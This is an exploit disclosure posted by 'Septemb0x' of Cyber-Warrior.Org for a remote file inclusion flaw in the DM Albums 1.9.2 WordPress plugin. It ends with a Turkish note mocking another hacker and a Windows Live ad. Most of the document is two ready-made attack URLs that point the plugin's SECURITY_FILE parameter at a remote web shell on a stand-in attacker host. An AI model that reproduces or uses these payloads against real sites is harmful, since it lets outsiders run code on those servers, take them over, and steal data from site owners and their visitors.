############################################################################################# [+] DM Albums™ 1.9.2 & WordPress Plug-in Remote File Include Vulnerability [+] Author : Septemb0x [+] www.Cyber-Warrior.Org - Information Technology's World [+] Greetz : BARCOD3 And All Friends... [+] Dork : Yok Dork Mork :D [+] Download Script : http://www.dutchmonkey.com/?file=/products/dm-albums/download_form.html [+] Product Site : http://www.dutchmonkey.com [+] Wp Plug-in : http://wordpress.org/extend/plugins/dm-albums/ ############################################################################################# [+] NORMAL EXPLOIT; [+] http://[sitename]/[wppath]/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://attackersite/shell.php [+] WORDPRESS EXPLOIT; [+] http://[sitename]/[wppath]/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://attackersite/shell.php ############################################################################################# < ---- Note ---- > H....R; Sen çok üstün zekaya sahip birisin, emin olbilirsin, :D Sql injection ile domain hackleyebilen tek lamersin, :D ASP'de Rfi Bulmakta Birebirsin, Ama Gördüğüm En hıyar Lamersin :D Bu Kafiyelerde Bi Tarafına Girsin ;) Lol H....R :D < ---- Note Finished ---- > _________________________________________________________________ Teker teker mi, yoksa hepsi birden mi? Arkadaşlarınızla ilgili güncel bilgileri tek bir yerden edinin. http://www.microsoft.com/turkiye/windows/windowslive/products/social-network-connector.aspx